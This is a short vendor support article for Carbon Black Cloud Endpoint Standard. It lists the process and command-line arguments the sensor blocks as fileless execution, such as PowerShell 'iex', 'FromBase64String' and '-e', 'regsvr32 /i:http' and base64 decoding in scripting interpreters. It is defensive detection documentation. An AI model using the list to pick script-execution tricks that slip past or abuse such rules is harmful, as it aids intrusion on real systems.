Endpoint Standard: How to find events blocked by fileless execution without the ttp tag
Article ID: 290256
Updated On:
Products
Carbon Black Cloud Endpoint Standard (formerly Cb Defense)
Issue/Introduction
Find the files that would be blocked by fileless execution without the ttp:FILELESS tag
Environment
- Carbon Black Cloud Console: All Versions
- Endpoint Standard Sensor: All Versions
Resolution
The following processes and commandline arguments will cause an event to be blocked as a fileless execution
| Process | Commandline Arguments |
|---|---|
| cmd.exe | /k, /r, or /c |
| powershell.exe | " \"iex\" ", " iex ", Invoke-Expression, FromBase64String, DeflateStream, -NonI, -e or -c |
| python.exe | decode or base64 |
| ruby.exe | unpack( |
| perl.exe | decode_base64( |
| regsvr32.exe | sct, /u, or /i:http |
Additional Information
Future work may be added to allow for more granular exclusions to allow certain scripts with these commands to execute - CBC-383
Feedback
Yes
No
Powered by
